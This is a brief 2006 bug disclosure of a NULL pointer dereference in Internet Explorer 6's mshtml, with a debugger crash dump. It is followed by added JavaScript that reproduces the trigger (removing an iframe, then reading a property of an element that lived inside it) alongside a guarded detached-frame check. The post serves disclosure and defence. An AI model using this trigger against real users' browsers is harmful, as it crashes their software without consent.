The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. It was discovered by Aviv Raff while working on a new browser fuzzing tool. It is possible to trigger a NULL pointer dereference by accessing a property of an object that lives inside a frame which has already been deleted: the reference to the object outlives the frame, and MSHTML follows a NULL markup pointer when the property is read.
Please see the demo source code for an example.
Demonstration
eax=00000000 ebx=01ba7180 ecx=00000000
edx=7dc95b90 esi=00000000 edi=00000000
eip=7dc9d8ba esp=0013dc98 ebp=0013dccc
mshtml!CMarkup::EnsureTopElems+0xc:
7dc9d8ba 8b7744 mov esi,dword ptr [edi+44h] ds:0023:00000044=????????
This bug will be added to the OSVDB:
Microsoft IE Orphan Object Property Access NULL Dereference
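The pattern the post describes, written out as an added example (this is not the MoBB demo page and not Aviv Raff's code): hold a reference to an element inside an iframe, remove the iframe, then read a property through the stale reference. The element id, the frame contents, and the isOrphaned/safeRead helpers are this example's own assumptions; the check relies on the modern DOM behaviour that a removed iframe's document loses its defaultView, which IE6 did not implement. In the crash dump above edi is 0 and the faulting instruction reads [edi+44h], i.e. address 0x44 in the unmapped null page, so on IE6 the unchecked read is a crash; on current browsers the same code simply returns, which is why the guarded accessor is the part a practitioner would keep.

```javascript
// Added example: generic "orphaned object property access" pattern from the
// post, not the original demo. Ids, markup and helper names are assumptions.

// Detached-frame check. Assumption: modern DOM, where a removed iframe's
// document has defaultView === null. IE6 had no defaultView at all and
// crashed in mshtml!CMarkup::EnsureTopElems instead of reporting this.
function isOrphaned(node) {
  var doc = node && node.ownerDocument;
  return !doc || !doc.defaultView;
}

// Guarded accessor: returns null instead of touching an orphaned object.
function safeRead(node, prop) {
  return isOrphaned(node) ? null : node[prop];
}

// Create an iframe with one element inside it and hand back both handles.
function buildFrame(doc) {
  var frame = doc.createElement('iframe');
  doc.body.appendChild(frame);
  var fdoc = frame.contentWindow.document;
  fdoc.open();
  fdoc.write('<div id="orphan">inside the frame</div>'); // constructed markup
  fdoc.close();
  return { frame: frame, inner: fdoc.getElementById('orphan') };
}

// The trigger as the post describes it: delete the frame, then read a
// property of an object that lived inside it. The unchecked read is the
// step that dereferenced NULL on IE6; the checked read is the safe form.
function touchOrphan(doc) {
  var h = buildFrame(doc);
  h.frame.parentNode.removeChild(h.frame);
  return {
    orphaned: isOrphaned(h.inner),
    unchecked: h.inner.innerHTML,
    checked: safeRead(h.inner, 'innerHTML')
  };
}

if (typeof document !== 'undefined') {
  // Browser only: under Node there is no DOM, so the trigger is not run.
  window.onload = function () {
    console.log(touchOrphan(document));
  };
}
```

Load the block in a page and touchOrphan(document) runs on load; isOrphaned and safeRead take any node-like object, so the check can be dropped into scripts that cache references across frame lifetimes.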
Saturday, July 29, 2006